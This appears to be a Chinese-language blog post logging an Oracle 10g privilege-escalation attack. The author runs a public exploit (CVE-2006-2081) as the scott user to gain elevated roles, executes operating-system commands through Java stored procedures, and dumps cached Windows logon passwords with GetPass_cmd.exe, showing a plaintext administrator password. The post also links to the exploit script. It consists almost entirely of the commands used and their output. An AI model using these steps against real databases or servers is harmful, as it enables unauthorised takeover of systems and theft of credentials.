一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权。
C:\wmpub>sqlplus scott/tiger@orcl
SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016
Copyright (c) 1982, 2005, Oracle. All rights reserved.
连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
SQL> @dbms_exp_ext.sql
[+] dbms_exp_ext.sql exploit (CVE-2006-2081)
[+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
[+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
Target username (default TEST): scott
[-] Wait...
程序包已创建。
[-] Building evil package...
原值 6: EXECUTE IMMEDIATE 'GRANT DBA TO &the_user';
新值 6: EXECUTE IMMEDIATE 'GRANT DBA TO scott';
程序包体已创建。
[-] Finishing evil package...
PL/SQL 过程已成功完成。
[-] YOU GOT THE POWAH!!
SQL> select * from user_role_privs; //提升得到JAVASYSPRIV权限
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT JAVASYSPRIV NO YES NO
SCOTT RESOURCE NO YES NO
SQL> @2.sql //执行系统命令,新建账号密码
Java created.
Function created.
Procedure created.
PL/SQL procedure successfully completed.
grant javasyspriv to system
*
ERROR at line 1:
ORA-01932: ADMIN option not granted for role 'JAVASYSPRIV'
Windows IP Configuration
Ethernet adapter ????:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.9.10.202
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.9.0.1
PL/SQL procedure successfully completed.
User accounts for \\
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_SNOWW-2CD7D87E5 IWAM_SNOWW-2CD7D87E5 SUPPORT_388945a0
The command completed with one or more errors.
PL/SQL procedure successfully completed.
SQL>
SQL> exec :x:=run_cmd('D:\temp\GetPass_cmd.exe'); //读取系统缓存的账号密码
UserName: Administrator
LogonDomain: WIN2003-WVS2
password: abc123!
UserName: NETWORK SERVICE
LogonDomain: NT AUTHORITY
password:
UserName:
LogonDomain:
Specific LUID NOT found
UserName: ANONYMOUS LOGON
LogonDomain: NT AUTHORITY
Specific LUID NOT found
UserName: WIN2003-WVS2$
LogonDomain: WORKGROUP
Specific LUID NOT found
PL/SQL procedure successfully completed.
SQL>
提权脚本:http://rawlab.mindcreations.com/codes/exploit/oracle/dbms_exp_ext.sql